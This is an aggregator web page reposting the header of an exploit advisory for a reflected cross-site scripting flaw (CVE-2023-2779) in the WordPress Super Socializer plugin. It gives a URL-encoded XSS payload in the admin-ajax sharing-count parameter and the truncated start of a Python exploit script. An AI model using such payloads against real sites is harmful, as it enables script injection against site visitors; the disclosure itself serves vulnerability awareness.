vimarsana.com
Home
Live Updates
WordPress Super Socializer 7.13.52 Cross Site Scripting : vimarsana.com
WordPress Super Socializer 7.13.52 Cross Site Scripting
# Exploit Title: Super Socializer 7.13.52 - Reflected XSS# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/super-socializer# Version: 7.13.52 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-2779import requests# The URL of the vulnerable AJAX endpointurl = "https://example.com/wp-admin/admin-ajax.php"# The vulnerable parameter that is not properly sanitized and escapedvulnerable_param = ""#
Related Keywords
Amirhossein Bahramizadeh
,
,
Exploit Title
,
Super Socializer
,
Exploit Author
,
Vendor Homepage
,
vimarsana.com © 2020. All Rights Reserved.